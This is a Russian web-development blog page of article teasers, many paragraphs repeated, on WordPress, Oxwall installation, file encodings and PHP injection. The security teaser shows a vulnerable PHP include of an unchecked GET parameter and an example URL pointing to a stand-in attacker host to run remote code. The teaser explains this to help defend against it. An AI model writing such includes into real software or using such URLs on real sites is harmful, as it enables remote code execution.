Web Мастерская
WordPress: движок блогов
С развитием технологий создать сайт в интернете стало возможно без специального обучения. К тому же интернет полон видео и текстовых обучающий материалов по данной тематике. Ну а на форумах или специализированных ресурсах всегда найдут опытные люди, готовые подсказать решение по возникшей проблеме. Если вы хотите создать блог, то рекомендуется использовать WorPress, с помощью которого можно управлять содержимым ресурсом с открытым исходным кодом.
Программа достаточно простая в освоении, к тому же, она предоставляет пользователю подсказки. Что немаловажно, данная программа бесплатна. У вас через месяц может уже не быть желания создавать сайт, и ни копейки вы не потратите на это мимолётное увлечение. Так же присутствует встроенный редактор.
Все эти факторы делают данную программу одной из популярнейших в своей отрасли. Всё это привлекает новичков, и вот уже много лет с помощью WordPress создаются сайты. Ну а после, если будет желание становиться профессионалом на этом поприще, то можно...
Программа достаточно простая в освоении, к тому же, она предоставляет пользователю подсказки. Что немаловажно, данная программа бесплатна. У вас через месяц может уже не быть желания создавать сайт, и ни копейки вы не потратите на это мимолётное увлечение. Так же присутствует встроенный редактор.
Все эти факторы делают данную программу одной из популярнейших в своей отрасли. Всё это привлекает новичков, и вот уже много лет с помощью WordPress создаются сайты. Ну а после, если будет желание становиться профессионалом на этом поприще, то можно...
- Жалоба
Как вставить код в статью WordPress (PHP|CSS|JS|...)
Не давно мне задали вопрос как вставить код в статью, движок WordPress (PHP|CSS|JS|...). Постараюсь ответить понятным языком.
Дело в том, что движок неправильно обрабатывает код вставленный в пост и есть большая вероятность, что код отобразится совершенно неправильно, возможно, что HTML код обработается как часть страницы, а не как текст. Приведу пример, я вставляю в запись следующий код (взятый из движка WP):
На экране получим такую картину:
Как видите часть кода:
...
Дело в том, что движок неправильно обрабатывает код вставленный в пост и есть большая вероятность, что код отобразится совершенно неправильно, возможно, что HTML код обработается как часть страницы, а не как текст. Приведу пример, я вставляю в запись следующий код (взятый из движка WP):
if ( ( ! $errors->get_error_code() ) && isset( $_POST['pass1'] ) && !empty( $_POST['pass1'] ) ) {
reset_password($user, $_POST['pass1']);
setcookie( $rp_cookie, ' ', time() - YEAR_IN_SECONDS, $rp_path, COOKIE_DOMAIN, is_ssl(), true );
login_header( __( 'Password Reset' ), '<p class="message reset-pass">' . __( 'Your password has been reset.' ) . ' <a href="' . esc_url( wp_login_url() ) . '">' . __( 'Log in' ) . '</a></p>' );
login_footer();
exit;
}На экране получим такую картину:
Как видите часть кода:
<p class="messageКак установить движок Oxwall
Краткая инструкция, как установить сайт на движке Oxwall.
И так. Переходим на официальный сайт и скачиваем архив с файлами движка, качать тут: https://developers.oxwall.com/download.
Загружаем файлы из скаченного архива на сервер. Затем переходим по адресу: site/install/site или на главную, вас перенаправит на страницу установки движка, автоматически. Тут заполняем все поля и жмем кнопку Continue:
Если все поля заполнены правильно, на следующей странице необходимо указать данные базы данных и прификс таблиц (по умолчанию ow_). На следующей странице вам будет предложено установить крон на выполнение сценария ow_cron/run.php, данный пункт можно пропустить и переходить дальше, но сделать это все ровно придется.
Переходим на новую страницу, тут предложено войти на сайт или в админ панель.
Готово....
И так. Переходим на официальный сайт и скачиваем архив с файлами движка, качать тут: https://developers.oxwall.com/download.
Загружаем файлы из скаченного архива на сервер. Затем переходим по адресу: site/install/site или на главную, вас перенаправит на страницу установки движка, автоматически. Тут заполняем все поля и жмем кнопку Continue:
Если все поля заполнены правильно, на следующей странице необходимо указать данные базы данных и прификс таблиц (по умолчанию ow_). На следующей странице вам будет предложено установить крон на выполнение сценария ow_cron/run.php, данный пункт можно пропустить и переходить дальше, но сделать это все ровно придется.
Переходим на новую страницу, тут предложено войти на сайт или в админ панель.
Готово....
Как определить кодировку файла
Есть много способов, которыми можно закодировать сообщение. При этом буквы преобразуются в различные символы. Но иногда, при заходе на веб-сайт, вы вместо привычных букв видите непонятные символы. Сегодня мы поговорим о способах определения кодировки файла.
Сделать это можно с помощью онлайн-декодера. Главным образом он служит для распознавания электронных писем. После того, как вы открыли декодер, скопируйте нужный вам текст в буфер обмена. Далее вставляет текст в поле декодера и нажимаем «расшифровать», после чего в поле должен появиться расшифрованный текст, а ниже исходная кодировка и кодировка, в которую был перекодирован текст.
Декодировать текст можно с помощью специальной программы, например, Tcode. Можете воспользоваться функцией «открыть файл» или вставить текст из кодированного файла. Нажимаем «перекодировать» и текст должен будет преобразоваться в нужную кодировку. В строке состояния будет показана исходная кодировка. Там же можно посмотреть процент распознания символов.
Пос...
Сделать это можно с помощью онлайн-декодера. Главным образом он служит для распознавания электронных писем. После того, как вы открыли декодер, скопируйте нужный вам текст в буфер обмена. Далее вставляет текст в поле декодера и нажимаем «расшифровать», после чего в поле должен появиться расшифрованный текст, а ниже исходная кодировка и кодировка, в которую был перекодирован текст.
Декодировать текст можно с помощью специальной программы, например, Tcode. Можете воспользоваться функцией «открыть файл» или вставить текст из кодированного файла. Нажимаем «перекодировать» и текст должен будет преобразоваться в нужную кодировку. В строке состояния будет показана исходная кодировка. Там же можно посмотреть процент распознания символов.
Пос...
Как предотвратить PHP, SQL и XSS инъекции (Безопасность)
Я конечно не супер-профессионал по безопасности, но некоторые познания в области безопасности php скриптов есть. Итак, часто встречающиеся дыры в php скриптах:
- PHP инъекция.
- SQL инъекция.
- XSS.
Вот про борьбу с этими уязвимостями и пойдёт речь. Статей по безопасности конечно уйма, но всё же, внесу и свою лепту.
Что же это такое PHP-инъекция?
PHP-инъекция - способ взлома сайта путём выполнения на сайте стороннего PHP кода. Например, вы хотите подключить необходимый файл, в зависимости от параметра, пришедшего из GET:
Если ввести такой URL:
- PHP инъекция.
- SQL инъекция.
- XSS.
Вот про борьбу с этими уязвимостями и пойдёт речь. Статей по безопасности конечно уйма, но всё же, внесу и свою лепту.
Что же это такое PHP-инъекция?
PHP-инъекция - способ взлома сайта путём выполнения на сайте стороннего PHP кода. Например, вы хотите подключить необходимый файл, в зависимости от параметра, пришедшего из GET:
# Получаем имя файла
$action = isset($_GET['action']) ? $_GET['action'] : null;
# Тут какие-то действия
# ...
# Подключаем файл
include($action);Если ввести такой URL:
http://ваш_сайт/ваш_файл.php?action=http://сайт_взломщика/файл то, если в файле php.ini на вашем сервере включена директива allow_url_include, злоумышленник может внести код, который хочет выполнить на вашем сайте, в тот файл, на который он указал ссылку и код успешно выполнится на вашем сайте....